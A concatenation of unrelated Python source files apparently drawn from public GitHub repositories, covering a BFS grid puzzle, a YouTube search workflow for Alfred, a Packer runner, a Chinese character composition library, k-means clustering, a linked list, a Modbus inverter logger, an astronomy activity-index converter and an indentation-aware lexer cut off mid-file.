| mhasan09/leetCode_M | koko_eating_banananas.py | koko_eating_banananas.py | py | 650 | python | en | code | 0 | github-code | 13 |
26624124389 | from _collections import deque
n, l ,r = map(int, input().split())
data = []
for i in range(n):
temp = list(map(int, input().split()))
data.append(temp)
def bfs( x, y, index):
q = deque()
# 초기 세팅, 방문처리
q.append([x,y])
union[x][y] = index
dx = [0,0,1,-1]
dy = [1,-1,0,0]
union_list = []
union_list.append([x,y])
num = 1
total = data[x][y]
while q:
row, col = q.popleft()
for i in range(4):
nx = row + dx[i]
ny = col + dy[i]
if nx >=0 and nx <n and ny>=0 and ny< n:
t1 = data[row][col]
t2 = data[nx][ny]
diff = abs(t1-t2)
# 조건 만족해도 방문한적 없어야 한다!!
if diff >=l and diff <=r and union[nx][ny] == -1 :
union_list.append([nx,ny])
union[nx][ny] = index
q.append([nx,ny])
num += 1
total += data[nx][ny]
for i,j in union_list:
data[i][j] = total//num
return num
total_count = 0
while True:
index = 0
# 방문 여부 확인을 위한 변수
union = [[-1] * n for _ in range(n)]
# 모든 요소에 대해 bfs 하기
for i in range(n):
for e in range(n):
if union[i][e] == -1:
bfs(i,e,index)
index += 1
if index == n*n :
break
total_count += 1
print(total_count)
| isakchoe/TIL | algorithm /dfs_bfs/ex_21.py | ex_21.py | py | 1,521 | python | en | code | 0 | github-code | 13 |
26161460535 | # encoding: utf-8
import sys
from workflow import Workflow, ICON_WEB, web
#API_KEY = 'AIzaSyAWrIPT4uIsUkymkPdvK3RJ-S6PNr-LMI0'
list_of_apis = [
#this is to avoid quota
#make sure the api keys are from different projects. So i had to make 8 projects. each project's api key goes here.
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>'
]
#this return a working api key. checks if they key is working with loading data of a sample video
def working_api():
for api in list_of_apis:
try:
r = web.get('https://www.googleapis.com/youtube/v3/videos', dict(key=api, part='snippet', id='2lAe1cqCOXo'))
if r.json()['kind'] == 'youtube#videoListResponse':
return(api)
except Exception:
pass
def main(wf):
url='https://www.googleapis.com/youtube/v3/search'
params= dict(key=working_api(), part='snippet', type='video', safeSearch='none' , maxResults=50, q=wf.args[0])
r = web.get(url, params)
# throw an error if request failed
# Workflow will catch this and show it to the user
r.raise_for_status()
# Parse the JSON returned by pinboard and extract the posts
result = r.json()
posts = result['items']
#print(type(posts[0]['snippet']['description']))
#print(posts[0]['snippet']['description'])
# Loop through the returned posts and add an item for each to
# the list of results for Alfred
for post in posts:
wf.add_item(title=post['snippet']['title'],
#subtitle = get_video_duration(post['id']['videoId'])+' | '+post['snippet']['channelTitle'],
subtitle = post['snippet']['channelTitle']+' | '+post['snippet']['publishedAt'],
arg='https://i.ytimg.com/vi/'+post['id']['videoId']+'/mqdefault.jpg',
valid=True,
icon='')
# Send the results to Alfred as XML
wf.send_feedback()
if __name__ == u"__main__":
wf = Workflow()
sys.exit(wf.run(main)) | namanrjpt/youtube-white-alfred | youtube.py | youtube.py | py | 2,389 | python | en | code | 0 | github-code | 13 |
25930015725 | # Copyright (c) 2012-2017, Andreas Heumaier<andreas.heumaier@microsoft.com>
# All rights reserved.
#
# See LICENSE file for full license.
#
# Packer build runnner
#
import subprocess
TEMPLATE = 'gitlab-ubuntu-docker.json'
VARFILE = 'varfile'
def validate(template=TEMPLATE):
print("execute validate")
subprocess.call('start /wait packer validate -var-file='+str(VARFILE)+'.json '+str(template), shell=True)
def run(template=TEMPLATE):
print('execute runner')
subprocess.call('start /wait packer build -var-file='+str(VARFILE)+'.json '+str(template), shell=True)
if __name__ == "__main__":
try:
validate()
except:
print("ERROR: Validate Failed")
exit(1)
else:
run()
else:
print("runPacker.py is being imported into another module")
| aheumaier/GitlabDemo | setup.py | setup.py | py | 831 | python | en | code | 2 | github-code | 13 |
10152525504 | import json
import os
import string
from collections import defaultdict
from importlib.resources import files
from fontTools import unicodedata
STRUCTURE = "IDEOGRAPHIC DESCRIPTION CHARACTER"
DATA_DIR = files("ids_py.data")
CHARACTERS_COMPOSITION_PATH = DATA_DIR.joinpath("IDS_characters_composition.json")
COMPONENTS_TO_CHARACTERS_PATH = DATA_DIR.joinpath("IDS_components_to_characters.json")
with open(CHARACTERS_COMPOSITION_PATH, "r", encoding="utf-8") as file:
characters = json.loads(file.read())
with open(COMPONENTS_TO_CHARACTERS_PATH, "r", encoding="utf-8") as file:
components_to_characters = json.loads(file.read())
character_structures = "⿰⿱⿲⿳⿴⿵⿶⿷⿸⿹⿺⿻"
def _component_order(composition):
compo_order = []
structure = ""
count = 0
if "\t" in composition:
composition = composition.split("\t")[0]
for char in composition:
try:
name = unicodedata.name(char)
except:
continue
if not name:
continue
if STRUCTURE in name:
structure = char
count = 0
else:
if char in string.printable:
continue
if count == 0:
compo_order.append((char, structure))
else:
compo_order.append((structure, char))
count = 1
return compo_order
def _structure(composition):
structure = ""
for char in composition:
try:
if STRUCTURE in unicodedata.name(char):
structure += char
except:
pass
return structure
def _flatten_composition(character, character_composition=[]):
character_composition = []
composition = characters.get(character, None)
if composition is not None:
for component in composition:
_component = characters.get(component, None)
if _component is not None:
if len(_component) > 1:
character_composition.append(
{
component: _flatten_composition(
component, character_composition
)
}
)
else:
character_composition.append(component)
else:
character_composition.append(component)
return character_composition
def structure(character):
composition = characters.get(character, None)
return _structure(composition)
def structural_composition(character):
composition = characters.get(character, None)
return _component_order(composition)
def composition(character, flatten=False):
if flatten:
return _flatten_composition(character)
else:
composition = characters.get(character, None)
return composition
def used_by(component, structure=None):
chars = components_to_characters.get(component, "")
if structure is None:
return chars
else:
structures = defaultdict(list)
for char in chars:
composition = characters.get(char, None)
s = _structure(composition)
if structure != "all" and s != structure:
continue
structures[s].append(char)
return structures
def similar_to(character):
composition = characters.get(character, None)
similar = defaultdict(list)
if composition is not None:
for index, compo in enumerate(_component_order(composition)):
characters_used_by = used_by(compo[0])
for character_used_by in characters_used_by:
_character_used_by = characters.get(character_used_by, None)
compo_order = _component_order(_character_used_by)
if index < len(compo_order):
if compo == compo_order[index]:
similar[compo].append(character_used_by)
return similar
| BlackFoundryCom/ids-py | src/ids_py/__init__.py | __init__.py | py | 3,995 | python | en | code | 1 | github-code | 13 |
14655281434 | # -*- coding:utf-8 -*-
import sys
from importlib import reload
reload(sys)
sys.setdefaultencoding('utf-8')
import numpy as np
#from numpy import *
#计算欧式距离
def distEcloud(vecA,vecB):
return np.sqrt(np.sum(np.power(vecA-vecB,2)))
#随机设置K个中心点
def randCenter(dataSet,k):
raw_number=np.shape(dataSet)[1]
zeroMatrix=np.mat(np.zeros([k,raw_number]))
for i in range(raw_number):
mini=np.min(dataSet[:,i])
rangei=float(np.max(dataSet[:,i])-mini)
zeroMatrix[:,i]=np.mat(mini+rangei*np.random.rand(k,1))
return zeroMatrix
def KMeans(dataSet, k, distMeans=distEcloud, createCent=randCenter):
m = np.shape(dataSet)[0] # 得到行数,即为样本数
clusterAssement = np.mat(np.zeros([m, 2])) # 创建 m 行 2 列的矩阵
centroids = createCent(dataSet, k) # 初始化 k 个中心点
clusterChanged = True
while clusterChanged:
clusterChanged = False
for i in range(m):
minDist = np.inf # 初始设置值为无穷大
minIndex = -1
for j in range(k):
# j循环,先计算 k个中心点到1 个样本的距离,在进行i循环,计算得到k个中心点到全部样本点的距离
distJ = distMeans(centroids[j, :], dataSet[i, :])
if distJ < minDist:
minDist = distJ # 更新 最小的距离
minIndex = j
if clusterAssement[i, 0] != minIndex: # 如果中心点不变化的时候, 则终止循环
clusterChanged = True
clusterAssement[i, :] = minIndex, minDist ** 2 # 将 index,k值中心点 和 最小距离存入到数组中
print(centroids)
# 更换中心点的位置
for cent in range(k):
ptsInClust = dataSet[np.nonzero(clusterAssement[:, 0].A == cent)[0]] # 分别找到属于k类的数据
centroids[cent, :] = np.mean(ptsInClust, axis=0) # 得到更新后的中心点
return centroids, clusterAssement
def KMeans1(dataset,k,distMeans=distEcloud):
line_number=np.shape(dataset)[0]
row_number = np.shape(dataset)[1]
clusterMat=np.mat(np.zeros([line_number,row_number]))
center_point=randCenter(dataset,k)
clusterChanged=True
while clusterChanged:
clusterChanged=False
for i in range(line_number):
minDist=np.inf
minIndex=-1
for j in range(k):
distJ=distEcloud(center_point[j,:],dataset[i,:])
if distJ < minDist:
minDist=distJ
minIndex=j
if clusterMat[i,0] !=minIndex:
clusterChanged=True
clusterMat[i,:]=[minIndex,minDist**2]
for cent in range(k):
ptsInClust=dataset[np.nonzero(clusterMat[:,0].A==cent)[0]]
center_point[cent,:]=np.mean(ptsInClust,axis=0)
print(ptsInClust)
return center_point,clusterMat
dataSetMatrix=np.mat([
[0.90796996, 5.05836784]
, [-2.88425582, 0.01687006]
, [-3.3447423, -1.01730512]
, [-0.32810867, 0.48063528]
, [1.90508653, 3.530091]
, [-3.00984169, 2.66771831]
, [-3.38237045, -2.9473363]
, [2.22463036, -1.37361589]
, [2.54391447, 3.21299611]
, [-2.46154315, 2.78737555]
, [-3.38237045, -2.9473363]
, [2.8692781, -2.54779119]
, [2.6265299, 3.10868015]
, [-2.46154315, 2.78737555]
, [-3.38237045, -2.9473363]
, [2.80293085, -2.7315146]
]
)
#distEcloud计算点与点之间的距离-测试
#vecA=np.array([1,0])
#vecB=np.array([4,4])
#print distEcloud(vecA,vecB)
#201907201715 update
center,cluster=KMeans1(dataSetMatrix,5)
print(center)
print(cluster)
| bgmlxxlmgb/PythonApp | src/core/main/algorithmic/classify/CLuster-KMeans.py | CLuster-KMeans.py | py | 3,789 | python | en | code | 0 | github-code | 13 |
5236063616 | class Node:
def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def print_list(self):
cur_node = self.head
while cur_node:
print(cur_node.data)
cur_node = cur_node.next
def append(self, data):
new_node = Node(data)
if self.head is None:
self.head = new_node
return
last_node = self.head
while last_node.next:
last_node = last_node.next
last_node.next = new_node
def prepend(self, data):
new_node = Node(data)
new_node.next = self.head
self.head = new_node
def delete_node(self, key):
cur_node = self.head
if cur_node and cur_node.data == key:
self.head = cur_node.next
cur_node = None
return
prev = None
while cur_node and cur_node.data != key:
prev = cur_node
cur_node = cur_node.next
if cur_node is None:
return
prev.next = cur_node.next
cur_node = None
llist = LinkedList()
llist.append('A')
llist.append('B')
llist.append('C')
llist.append('D')
llist.delete_node('B')
llist.prepend('E')
llist.print_list()
| rvirjn/data-science | ds/singly_linked_list.py | singly_linked_list.py | py | 1,302 | python | en | code | 2 | github-code | 13 |
549158344 | import os
if 'APP_CONFIG' not in os.environ:
os.environ['APP_CONFIG'] = '/brum/dev/PowerMeter/scripts/config/bat_inverter.yaml'
"""
Based on MODBUS-HTML_SI44M-80H-13_32009R_V10
"""
import time
import datetime
from lib import log, config
from lib.quicklock import lock
from lib.telemetry import send_data_lines
from common.tracker import Tracker
from common.modbus import ModbusDataCollector, RegisterType
TRACKERS = [
Tracker('discharge', 'inverter.battery.supply', {"source": "sunny_island", "src": "sma"}, True, True, True, False, True),
Tracker('charge', 'inverter.battery.consume', {"source": "sunny_island", "src": "sma"}, True, True, True, False, True),
Tracker('discharge.total', 'inverter.battery.supply.total', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
Tracker('charge.total', 'inverter.battery.consume.total', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
Tracker('bat.SOC', 'inverter.battery.SOC', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
Tracker('event.code', 'inverter.battery.status', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
]
MODBUS_DATA_COLLECTOR = ModbusDataCollector([
(30845, RegisterType.U32, 'bat.SOC'),
(30849, RegisterType.S32_F1, 'bat.temp'),
(31393, RegisterType.U32, 'charge'),
(31395, RegisterType.U32, 'discharge'),
(31397, RegisterType.U64, 'charge.total'),
(31401, RegisterType.U64, 'discharge.total'),
(30247, RegisterType.U32, 'event.code'),
])
def update():
if datetime.datetime.now().second % 5 != 0:
return
data_dict = MODBUS_DATA_COLLECTOR.read()
for tracker in TRACKERS:
tracker.track(data_dict)
def send():
data_lines = []
for tracker in TRACKERS:
data_lines.extend(tracker.get_data_lines())
tracker.reset()
send_data_lines("power", data_lines)
# print("=" * 40)
# for data_line in data_lines:
# print(data_line)
if __name__ == "__main__":
try:
lock()
except RuntimeError:
exit(0)
log("Starting SunnyIsland data collector")
MODBUS_DATA_COLLECTOR.connect(config["address"], 502, 3)
while True:
current_minute = datetime.datetime.now().minute
while datetime.datetime.now().minute == current_minute:
update()
time.sleep(1)
send()
| funnybrum/PowerMeter | scripts/bat_inverter.py | bat_inverter.py | py | 2,431 | python | en | code | 0 | github-code | 13 |
37862285443 | from __future__ import print_function
from PyAstronomy.pyaC import pyaErrors as PE
import numpy as np
class SMW_RHK:
def __init__(self, ccfs="rutten", afc="middelkoop", rphot="noyes"):
"""
Converting Mount-Wilson S-index into RHK index.
The Mount-Wilson S-index is a measure of the emission-line cores
of the Ca II H and K lines at about 3933 A and 3968 A in two
narrow bands normalized by two adjacent continuum bands.
The activity index RHK is closely related to the S-index. In
particular, it gives the emission in the narrow bands normalized
by the bolometric brightness of the star
.. math::
R_{HK} = \\frac{4\\pi R_s^2 (F_H + F_K)}{4\\pi R_s^2\\sigma T_{eff}^4} = \\frac{F_H+F_K}{\\sigma T_{eff}^4} \\; .
The stellar surface flux in "arbitrary units" in the narrow
H and K bands (fH + fK) is related to the Mount-Wilson S-index
through the relation
.. math::
f_H + f_K = S C_{cf} T_{eff}^4 10^{-14} \\; ,
where Ccf is a conversion factor, which can be parameterized in terms of
the B-V color and the luminosity class. The conversion between
arbitrary units and physical units, needed to derive the true surface
flux and the RHK index, has been derived by several authors
starting with Middelkoop 1982.
Their factor was also used by Noyes et al. 1984---in particular in their
appendix a, where is appears implicitly. Later, the value of the conversion
factor has been revised by several authors, e.g., Oranje 1983 and Rutten 1984,
who estimated a value about 70% larger than previously proposed. Hall et al.
2007 derive a value 40% larger than that of Middelkoop 1982 and provide
a thorough discussion on the differences between the individual approaches
and results given in the literature.
Finally, the RHK index thus derived still covers a photospheric
contribution, which is always present and not related to the
chromosphere. To obtain the purely chromospheric, primed RHK index,
an estimate of the photospheric surface flux in the H and K pass-bands
has to be subtracted. For active stars, the photospheric correction
is usually quite irrelevant. For inactive, quiet stars, it can,
however, be important.
The issue of the Mount-Wilson S-index conversion has been revisited
by Mittag et al. 2013, who provide an alternative conversion procedure
and revised photospheric corrections for various luminosity classes.
.. note:: In the default configuration, the conversion of the S-index
into RHK is identical to the relation stated by Noyes et al. 1984
in their appendix (a)
.. math::
R_{HK} = 1.340 \\times 10^{-4} C_{cf} S
where the factor 1.34e-4 is a combination of the conversion from
arbitrary to physical units, 1e-14, and the Stefan-Boltzmann
constant, in particular 1.34e-4 = 7.6e5*1e-14/5.67e-5. The Ccf factor
is, however, calculated according to Rutten 1984.
The relations and coefficients used here are taken from the
following publications (and references therein):
- Middelkoop 1982, A&A 107, 31
- Oranje 1983, A&A 124, 43
- Noyes et al. 1984, A&A 279, 763
- Rutten 1984, A&A 130, 353
- Hall et al. 2007, AJ 133, 862
- Mittag et al. 2013, A&A 549, 117
Parameters
----------
ccfs : string, {rutten, noyes}, optional
Source of the conversion factor between S-index and RHK.
afc : string, {rutten, oranje, middelkoop, hall}, optional
Source of conversion factor between "arbitrary units"
and physical units of surface flux.
rphot : string, {noyes}
The source for the photospheric correction for the RHK
index.
"""
if ccfs == "rutten":
self._log10ccf = self.log10ccfRutten
elif ccfs == "noyes":
self._log10ccf = self.log10ccfNoyes
else:
raise(PE.PyAValError("No such Ccf source: " + str(ccfs), \
solution="Use 'rutten' or 'noyes'."))
self._ccfs = ccfs
if rphot == "noyes":
self._logrphot = self.logRphotNoyes
else:
raise(PE.PyAValError("No such source for the photospheric correction: " + str(rphot), \
solution="Use 'noyes'."))
self._rphots = rphot
self._afc = afc
# The conversion factor from "arbitrary units" to physical units.
self._absCal = {"rutten":1.29e6, "oranje":1.21e6, "middelkoop": 7.6e5, "hall":1.07e6}
if not self._afc in self._absCal:
raise(PE.PyAValError("No such source for the conversion from arbitrary to physical units: " + str(self._afc), \
solution="Use either of: " + ', '.join(self._absCal.keys()) ))
from PyAstronomy.pyasl import _ic
if not _ic.check["quantities"]:
raise(PE.PyARequiredImport("The 'quantities' package is not installed, which is required to use 'SMW_RHK'.", \
where="SMW_RHK", \
solution="Install quantities (https://pypi.python.org/pypi/quantities/0.10.1)."))
from PyAstronomy import constants as PC
self._pc = PC.PyAConstants()
self._pc.setSystem("cgs")
def logRphotNoyes(self, bv, lc="ms"):
"""
Photospheric contribution to surface flux in the H and K pass-bands.
Relation given by Noyes et al. 1984.
Parameters
----------
bv : float
B-V color [mag]
lc : string, {ms, g}, optional
Luminosity class.
Returns
-------
log10(Rphot) : float
Logarithm of the photospheric contribution.
"""
if (bv < 0.44) or (bv > 0.82):
PE.warn(PE.PyAValError("Noyes et al. 1984 give a validity range of 0.44 < B-V < 0.82 for the " + \
"photospheric correction. However, the authors use it for B-V > 0.82, " + \
"where it quickly decreases."))
if lc != "ms":
PE.warn(PE.PyAValError("Noyes et al. 1984 specify the photospheric correction only for main-sequence stars."))
rp = -4.898 + 1.918*bv**2 - 2.893*bv**3
return rp
def log10ccfNoyes(self, bv, **kwargs):
"""
Ccf conversion factor according to Noyes et al. 1984.
Parameters
----------
bv : float
The B-V color [mag].
Returns
-------
log10(Ccf) : float
The logarithm of the conversion factor.
"""
if ("lc" in kwargs) and (kwargs["lc"] != "ms"):
PE.warn(PE.PyAValError("The Ccf conversion factor by Noyes et al. 1984 is only valid for main-sequence stars.", \
solution="Use the conversion factor by Rutten 1984 for giants."))
logccf = 1.13*bv**3 - 3.91*bv**2 + 2.84*bv - 0.47
if bv <= 0.63:
x = 0.63 - bv
dlogccf = 0.135*x - 0.814*x**2 + 6.03*x**3
logccf += dlogccf
return logccf
def log10ccfRutten(self, bv, lc="ms"):
"""
Ccf conversion factor from Rutten 1984 (Eqs. 10a and 10b).
Parameters
----------
bv : float
B - V color [mag].
lc : string, {ms, g}, optional
Specifies whether the relation for
main-sequence (ms) or giant (g) stars
shall be evaluated.
Returns
-------
log10(Ccf) : float
The logarithm of the conversion factor.
"""
if lc == "ms":
if (bv < 0.3) or (bv > 1.6):
PE.warn(PE.PyAValError("B-V color out of range. Rutten 1984 states a validity range of 0.3 <= b-v <= 1.6 " +
"for main-sequence stars. You specified: " + str(bv) + "."))
logccf = 0.25*bv**3 - 1.33*bv**2 + 0.43*bv + 0.24
elif lc == "g":
if (bv < 0.3) or (bv > 1.7):
PE.warn(PE.PyAValError("B-V color out of range. Rutten 1984 states a validity range of 0.3 <= b-v <= 1.7 " +
"for giant stars. You specified: " + str(bv) + "."))
logccf = -0.066*bv**3 - 0.25*bv**2 - 0.49*bv + 0.45
else:
raise(PE.PyAValError("No such luminosity class: " + str(lc), \
solution="Specify either 'ms' or 'g'."))
return logccf
def FHFK(self, S, Teff, log10ccf):
"""
Calculate the FH+FK flux in arbitrary units.
Parameters
----------
S : float
Mount-Wilson S-index.
Teff : float
The effective temperature [K].
log10ccf : float
The logarithm of the Ccf conversion factor.
Returns
-------
FH + FK : float
The stellar surface flux in the H and K pass-bands
in arbitrary units (not erg/cm**2/s).
"""
ccf = 10.0**log10ccf
fhfk = S * ccf * Teff**4 * 1e-14
return fhfk
def SMWtoRHK(self, S, Teff, bv, lc="ms", verbose=False):
"""
Convert Mount-Wilson S-index into R_HK.
Parameters
----------
S : float
Mount-Wilson S-index.
Teff : float
Effective temperature [K].
bv : float
B-V color [mag]
lc : String, {ms, g}, optional
Luminosity class; Main-sequence (ms) or giants (g)
verbose : boolean, optional
If True, the details of the calculation are printed
to stdout.
Returns
-------
RHK prime : float
RHK parameter corrected for photospheric contribution. The primed
number measures the purely chromospheric emission.
RHK : float
RHK parameter without correction for photospheric contribution.
ccf : float
The Ccf conversion factor used.
fhfk : float
The FH+FK surface flux in arbitrary units.
fhfk (physical) : float
The FH+FK surface flux in physical units [erg/cm^2/s].
R_phot : float
Photospheric flux contribution used in translating RHK into
RHK prime.
"""
# Get Ccf conversion factor
log10ccf = self._log10ccf(bv, lc=lc)
ccf = 10.0**log10ccf
# Get FH+FK
fhfk = self.FHFK(S, Teff, log10ccf)
# Convert arbitrary units to physical units
surfaceFlux = fhfk * self._absCal[self._afc]
# Get RHK (includes photospheric contribution)
rhk = surfaceFlux/(self._pc.sigma * Teff**4)
# Get the photospheric correction
logrphot = self._logrphot(bv, lc=lc)
# Correct RHK for photospheric contribution
rhkprime = rhk - 10.0**logrphot
if verbose:
print("Converting Mount-Wilson S-index to RHK")
print(" Source of photospheric correction: " + self._rphots)
print(" Source of Ccf conversion factor: " + self._ccfs)
print(" log10ccf = %6.3e, ccf = %6.3e" % (log10ccf, ccf))
print(" Surface flux in H and K pass-bands in arbitrary units: %6.3e" % (fhfk))
print(" Arbitrary unit to flux conversion factor: %6.3e" % (self._absCal[self._afc]) + \
" from source: " + self._afc)
print(" Surface flux in physical units [erg/cm^2/s]: %6.3e" % (surfaceFlux))
print(" R_HK (including photosphere): %6.3e" % (rhk))
print(" log10(R_HK) (including photosphere): %6.3e" % (np.log10(rhk)))
print(" Photospheric contribution (log10(R_phot)): %6.3e" % logrphot)
print(" R_HK prime (corrected for photospheric correction): %6.3e" % (rhkprime))
print(" log10(R_HK prime) (corrected for photospheric correction): %6.3e" % ((np.log10(rhkprime))))
return rhkprime, rhk, ccf, fhfk, surfaceFlux, 10.0**logrphot
| sczesla/PyAstronomy | src/pyasl/asl/sindex.py | sindex.py | py | 11,836 | python | en | code | 134 | github-code | 13 |
21230531925 | """empty message
Revision ID: 96db82cc5f09
Revises:
Create Date: 2023-09-15 11:46:08.150893
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '96db82cc5f09'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('student',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('class_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('age', sa.String(length=90), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('su_class',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('class_name', sa.String(), nullable=False),
sa.Column('stu_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_name', sa.String(length=90), nullable=False),
sa.Column('phone_number', sa.String(), nullable=True),
sa.Column('email', sa.String(length=90), nullable=False),
sa.Column('age', sa.String(length=90), nullable=True),
sa.Column('password', sa.Text(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('user')
op.drop_table('su_class')
op.drop_table('student')
# ### end Alembic commands ###
| itsnotanant8288/simple-python-backend | migrations/versions/96db82cc5f09_.py | 96db82cc5f09_.py | py | 1,684 | python | en | code | 0 | github-code | 13 |
4970463773 | import sys
sys.setrecursionlimit(1000000000)
INF = 1000000009
MAX = 100001
dist = []
graph = []
class Triad:
def __init__(self, source, target, weight):
self.source = source
self.target = target
self.weight = weight
def __lt__(self, other):
if self.weight < other.weight:
return True
if self.weight == other.weight:
if (self.source < other.source) or (self.source == other.source and self.target < other.target):
return True
return False
def makeSet(v):
global parent, ranks
parent = [i for i in range(v + 1)]
ranks = [0 for i in range(v + 1)]
def findSet(u):
if parent[u] != u:
parent[u] = findSet(parent[u])
return parent[u]
def unionSet(u, v):
up = findSet(u)
vp = findSet(v)
if up == vp:
return
if ranks[up] > ranks[vp]:
parent[vp] = up
else:
if ranks[up] < ranks[vp]:
parent[up] = vp
else:
parent[up] = vp
ranks[vp] += 1
def calcMST():
res = 0
for i in range(len(dist)):
res += dist[i].weight
return res
def Kruskal(V):
graph.sort()
i = 0
while (len(dist) != V - 1 and i < len(graph)):
edge = graph[i]
i += 1
u = findSet(edge.source)
v = findSet(edge.target)
if u != v:
dist.append(edge)
unionSet(u, v)
def minPrice(s):
makeSet(s)
Kruskal(s)
for i in range(1, s):
u = findSet(0)
v = findSet(i)
if u != v:
return -1
sum = 0
for i in range(len(dist)):
sum += dist[i].weight
return sum
while True:
S, C = map(int, input().split(' '))
if S == C == 0:
break
graph.clear()
dist.clear()
station = dict()
for i in range(S):
name = input()
station[name] = i
for i in range(C):
st = list(input().split(' '))
source = st[0]
des = st[1]
d = int(st[2])
graph.append(Triad(station[source], station[des], d))
name = input()
res = minPrice(S)
if res != -1:
print(res)
else:
print("Impossible")
| truclycs/code_for_fun | algorithms/python/python_blue/L21/_11710___Expensive_subway.py | _11710___Expensive_subway.py | py | 2,129 | python | en | code | 7 | github-code | 13 |
39424037573 | import re
from enum import Enum
from PreLexer import PreLexer, Token, RecognitionException
from CompilerException import CompilerException
# TODO: move to utils?
def iterUntil(func, cond):
res = func()
while not cond(res):
yield res
res = func()
# Gives numbers to tokens, and generates a token specification for antlr parser
def _enumerateTokens(tokens):
class EnumeratedTokens:
@staticmethod
def exportToAntlr():
allTokens = EnumeratedTokens._allTokens
return '\n'.join("{}={}".format(name, index)
for name, index in allTokens.items())
@staticmethod
def fromPreLexerTokenType(token):
if token == Token.EOF:
return Token.EOF
tokenMap = EnumeratedTokens._fromPrelexerTokens
if token in tokenMap:
return tokenMap[token]
raise RuntimeError("Invalid token value %d" % token)
EOF = Token.EOF
_allTokens = {}
_fromPrelexerTokens = {}
for i, token in enumerate(tokens, Token.MIN_USER_TOKEN_TYPE):
for name in token:
if not hasattr(EnumeratedTokens, name):
setattr(EnumeratedTokens, name, i)
EnumeratedTokens._allTokens[name] = i
if hasattr(PreLexer, name):
prelexerIndex = getattr(PreLexer, name)
EnumeratedTokens._fromPrelexerTokens[prelexerIndex] = i
return EnumeratedTokens
AHToken = _enumerateTokens([
('LParen', "'('"),
('RParen', "')'"),
('Dot', "'.'"),
('RArrow', "'->'", "'→'"),
('RDoubleArrow', "'=>'", "'⇒'"),
('Equal', "'='"),
('Underscore', "'_'"),
('Colon', "':'"),
('BeginBlock',),
('EndBlock',),
('Data', "'data'"),
('Where', "'where'"),
('Module', "'module'"),
('From', "'from'"),
('Import', "'import'"),
('Pragma', "'pragma'"),
('NEWLINE',),
('ID',)])
def convertPreLexerTokenToAHToken(token):
newToken = token.clone()
newToken.type = AHToken.fromPreLexerTokenType(token.type)
return newToken
class LexerError(CompilerException):
def __init__(self, msg, line, column, pos):
super().__init__(msg)
self.line = line
self.column = column
self.pos = pos
def __str__(self):
return "[{}-{}] {}".format(self.line, self.column, super().__str__())
# This lexer modifies output of PreLexer token stream in order to handle
# indentation. Most of the tokens are just past through.
# Several things to token stream are done:
# 1. Whenever token 'where' occures, a 'BeginBlock' token also emited and new
# indented block (possibly empty) is started. Newline is not emited after
# 'where'. When indented block is ended token 'EndBlock' is emited.
# 2. If newline occures followed by increased indentation then it's treated as
# line continuation and lines are connected and newline is not emitted
# 3. When several newlines in a row encountered all after the first one are
# dropped. This includes the (2) rule.
# 4. Just before EOF it is ensured that newline token is present (otherwise it
# is added)
#
# Implements TokenStream
class AHLexer:
def __init__(self, input=None):
# TODO: possibly clear error listeners and maybe modify error handling
# strategy
self._prelexer = PreLexer(input)
self._indentations = [ ]
self._state_handlers = {
'FILE_START': self._state_file_start,
'DEFAULT': self._state_default,
'BEGIN_BLOCK': self._state_begin_block,
'FIND_INDENTATION': self._state_find_indentation,
'CLOSE_ALL_SCOPES': self._state_close_all_scopes,
'CLOSE_SCOPE': self._state_close_scope,
'EOF': self._state_eof
}
self._State = Enum('_State', list(self._state_handlers.keys()))
self._state = self._State.FILE_START
# Some states want to know what token is next, but postpone emitting it
self._lookaheadToken = None
# TokenSource interface
def getCharPositionInLine(self):
return self._prelexer.getCharPositionInLine()
def getInputStream(self):
return self._prelexer.getInputStream()
def getLine(self):
return self._prelexer.getLine()
def getSourceName(self):
return self._prelexer.getSourceName()
def getTokenFactory(self):
return self._prelexer.getTokenFactory()
def nextToken(self):
if self._state.name not in self._state_handlers:
raise RuntimeError("Invalid state")
return self._state_handlers[self._state.name]()
def setTokenFactory(self, factory):
return self._prelexer.setTokenFactory(factory)
# TODO: potentially change implementation and add other erro listener methods
def addErrorListener(self, listener):
self._prelexer.addErrorListener(listener)
def removeErrorListeners(self):
self._prelexer.removeErrorListeners()
# Private methods
def _state_file_start(self):
nextToken = self._skip_newlines()
if nextToken.type == Token.EOF:
self._push_indentation(0)
return self._gotoState(self._State.EOF)
self._push_indentation(nextToken.column)
self._lookaheadToken = nextToken
return self._gotoState(self._State.DEFAULT)
def _state_default(self):
if self._lookaheadToken is not None:
nextToken = self._lookaheadToken
self._lookaheadToken = None
else:
nextToken = self._prelexer.nextToken()
if nextToken.type == PreLexer.NEWLINE:
return self._maybe_newline(nextToken)
elif nextToken.type == PreLexer.Where:
self._state = self._State.BEGIN_BLOCK
return convertPreLexerTokenToAHToken(nextToken)
elif nextToken.type == Token.EOF:
self._state = self._State.CLOSE_ALL_SCOPES
return self._make_token(AHToken.NEWLINE, '\n')
else:
return convertPreLexerTokenToAHToken(nextToken)
# Precondition: self._lookaheadToken is None
def _state_begin_block(self):
